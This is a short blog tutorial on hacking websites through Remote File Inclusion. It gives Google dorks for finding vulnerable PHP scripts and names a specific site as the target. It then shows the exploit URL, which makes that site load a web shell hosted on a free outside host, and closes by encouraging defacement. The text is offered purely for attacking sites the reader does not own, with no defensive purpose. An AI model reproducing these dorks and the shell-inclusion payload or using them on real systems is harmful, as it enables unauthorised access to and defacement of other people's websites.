How to hack a website using RFI method

How to hack a website using RFI method

RFI ( Remote File Inclusion ) is a method of injecting the remote file link to the server and get the site access. By this vulnerability attacker can deface or compromise the data from the site.
* Before getting start ( Things required )

• A shell uploaded in any webhosting try my3gb( dot )com ( Any shell you like )
• Vulnerable site
• A sharp brain 

Mostly Used Dorks for RFI :-
inurl:/modules/My_eGallery/public/displayCategory.php?basepath=
inurl:/modules/mod_mainmenu.php?mosConfig_absolute_path=
inurl:/include/new-visitor.inc.php?lvc_include_dir=
inurl:/_functions.php?prefix=
inurl:/cpcommerce/_functions.php?prefix=
inurl:/modules/coppermine/themes/default/theme.php?THEME_DIR=

How to Hack website using RFI method

After uploading the shell in the hosting get it’s link eg:- username.my3gb.com/shell_name.php . Now it’s for the Vulnerable site.
You can get them by Using dorks. I am using this site :- http://www.cbspk.com
Here’s the vulnerable the link of the site :- http://www.cbspk.com/v2/index.php?page=site link here.
now to check whether the site is vulnerable or not you have to put the any site link after ?page= for example :-

http://www.cbspk.com/v2/index.php?page=http://google.com

If it will open google.com in the same page then it’s vulnerable and if it didn’t then check any other site.

Now after getting the vulnerable site replace the http://google.com with your shell link. Now exploit link will be :-

http://www.cbspk.com/v2/index.php?page=http://username.my3gb.com/shell.php?

And add ? also to the link if the site is vulnerable it will embedded the page to the site.
After successfully execution. The only thing left is your creativity Defacing 
Hope you enjoyed the tutorial ” How to hack a website using RFI method “  and don’forget to share it 

Posted in: HACKING